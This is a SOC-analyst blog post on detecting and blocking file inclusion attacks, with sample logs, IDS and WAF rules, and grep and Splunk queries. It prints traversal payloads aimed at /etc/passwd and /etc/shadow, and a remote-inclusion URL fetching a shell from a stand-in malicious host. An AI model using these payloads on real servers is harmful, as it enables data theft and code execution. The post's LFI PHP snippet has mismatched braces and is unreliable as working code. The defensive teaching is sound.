Local File Inclusion (LFI) and Remote File Inclusion (RFI) attacks are critical vulnerabilities that can compromise web application security. LFI allows attackers to include files from the server, potentially exposing sensitive data. RFI, on the other hand, lets attackers include remote files, which can lead to the execution of malicious code. This blog will delve into detecting these attacks, simulate scenarios for practical understanding, and outline methods to protect against them as a SOC analyst.
Local File Inclusion (LFI) occurs when an attacker tricks a web application into exposing or running files on the server. This is typically done by manipulating file path parameters. For instance, an attacker might alter the URL parameter to include a file from the server's file system, such as ../../../../etc/passwd, aiming to access sensitive information.
Remote File Inclusion (RFI) allows attackers to include files from remote servers. This can lead to the execution of malicious scripts hosted externally. For example, if a web application accepts a URL as a parameter to include a file, an attacker might inject a URL pointing to a malicious script, leading to code execution on the server.
Web Server Logs: Regularly inspect server logs for suspicious patterns such as repeated directory traversal sequences (../../). Unusual file requests, like accessing system files (e.g., /etc/passwd), should raise alerts.
Example Logs:
127.0.0.1 - - [08/Jun/2024:16:15:42 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 5110
127.0.0.1 - - [08/Jun/2024:16:17:10 +0000] "GET /view.php?file=../../../../var/log/auth.log HTTP/1.1" 200 2048
192.168.1.1 - - [08/Jun/2024:16:20:55 +0000] "GET /index.php?page=../../../../etc/shadow HTTP/1.1" 200 1536
192.168.1.1 - - [08/Jun/2024:16:22:18 +0000] "GET /home.php?file=../../../../etc/hosts HTTP/1.1" 200 612
Application Logs: Monitor for errors or anomalies in accessing files. Unexpected file access attempts, especially to sensitive or unusual files, can indicate an LFI attack.
Example Logs:
ERROR - 08/Jun/2024 16:15:42 --> File access error: ../../../../etc/passwd
ERROR - 08/Jun/2024 16:17:10 --> File access error: ../../../../var/log/auth.log
ERROR - 08/Jun/2024 16:20:55 --> File access error: ../../../../etc/shadow
ERROR - 08/Jun/2024 16:22:18 --> File access error: ../../../../etc/hosts
Signature-Based Detection: IDS tools can use pre-defined signatures to detect known LFI and RFI patterns. Signatures might include common payloads or patterns used in these attacks.
Example IDS Rule:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS directory traversal attempt"; flow:to_server,established; content:"../"; nocase; classtype:web-application-attack; sid:1206; rev:8;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS remote file inclusion attempt"; flow:to_server,established; uricontent:"http://"; nocase; classtype:web-application-attack; sid:1207; rev:8;)
Anomaly-Based Detection: IDS tools can also use behavioral analysis to identify deviations from normal traffic patterns. This includes unusual file requests or abnormal URL structures indicative of LFI or RFI attempts.
Example IDS Alerts:
[**] [1:1206:8] WEB-ATTACKS directory traversal attempt [**]
[Priority: 1] {TCP} 192.168.1.2:12345 -> 192.168.1.1:80
[**] [1:1207:8] WEB-ATTACKS remote file inclusion attempt [**]
[Priority: 1] {TCP} 192.168.1.2:12346 -> 192.168.1.1:80
Web Application Firewalls (WAF)
Rule-Based Filtering: Implement WAF rules to block common LFI and RFI payloads. Rules can include blocking suspicious file path patterns or disallowing URLs as input parameters for file inclusions.
Example WAF Rules:
SecRule REQUEST_URI "@rx \.\./\.\./" "id:1234,phase:2,deny,status:403,msg:'LFI Attempt Detected'"
SecRule ARGS_NAMES "@rx ^(http|https)://" "id:1235,phase:2,deny,status:403,msg:'RFI Attempt Detected'"
Input Validation: Ensure the WAF is configured to validate and sanitize all input parameters. This prevents malicious inputs from being processed by the web application.
Example WAF Logs:
[2024-06-08 16:15:42] - Denied - ID: 1234 - Message: 'LFI Attempt Detected' - Source: 192.168.1.2
[2024-06-08 16:17:10] - Denied - ID: 1235 - Message: 'RFI Attempt Detected' - Source: 192.168.1.2
Linux Log Analysis Queries:
grep -E '(\.\./)+|%2e%2e%2f|http://|https://' /var/log/apache2/access.log # Combined LFI and RFI Patterns
Splunk Queries:
index=web_logs (uri_query="*../*" OR uri_query="*%2e%2e*" OR uri_query="*http://*" OR uri_query="*https://*")# Detecting LFI and RFI
index=web_logs (uri_query="*etc/passwd*" OR uri_query="*/proc/self/environ*" OR uri_query="*/var/www/html*")# Specific File Indicators
To detect web attacks (including LFI and RDI), you can more details on Detecting Web Attacks course.
Example of an LFI Attack
Code Example:
<?php
$file = $_GET['file'];
if(isset($file)) {
// Validate the file parameter to prevent directory traversal attacks
$file = basename($file);
$path = '/var/www/html/files/' . $file;
// Ensure the file exists before including it
if(file_exists($path)) {
include($path);
} else {
echo "File not found.";
} else {
echo "No file specified.";
}
?>
Detection: SOC analysts can detect this by monitoring web server logs for directory traversal patterns and unusual file access attempts. Setting up alerts for such patterns can help quickly identify potential LFI attacks.
Example Log Entry:
127.0.0.1 - - [08/Jun/2024:16:15:42 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 5110
1. Scenario: A web application includes a remote file based on a user-provided URL.
2. Payload: An attacker includes a malicious script hosted on a remote server. For example: http[:]//example[.]com/view.php?file=http://malicious.com/shell.txt
Code Example:
<?php
$file = $_GET['file'];
if(isset($file)) {
// Whitelist allowed URLs to prevent remote file inclusion attacks
$allowed_urls = ['https://trusted.com/file1.txt', 'https://trusted.com/file2.txt'];
if(in_array($file, $allowed_urls)) {
include($file);
} else {
echo "Invalid file.";
}
} else {
echo "No file specified.";
}
?>
Detection: SOC analysts can monitor for unexpected external requests in web server logs and IDS alerts. Anomalies in outgoing traffic patterns, such as frequent requests to unknown or suspicious external domains, can indicate RFI attempts.
Example Log Entries:
127.0.0.1 - - [08/Jun/2024:16:15:42 +0000] "GET /view.php?file=http://malicious.com/shell.txt HTTP/1.1" 200 5110
127.0.0.1 - - [08/Jun/2024:16:17:10 +0000] "GET /view.php?file=http://malicious.com/backdoor.php HTTP/1.1" 200 2048
Detecting and preventing LFI and RFI attacks requires a combination of robust coding practices, vigilant monitoring, and effective use of security tools. By understanding the mechanisms of these attacks and implementing the discussed detection and protection strategies, SOC analysts can significantly enhance the security posture of their organizations.
- OWASP Top Ten: A comprehensive guide to the most critical web application security risks.
- Web Security Academy(PortSwigger): A platform offering tutorials and labs on web security vulnerabilities, including LFI and RFI.
.png)
.png)
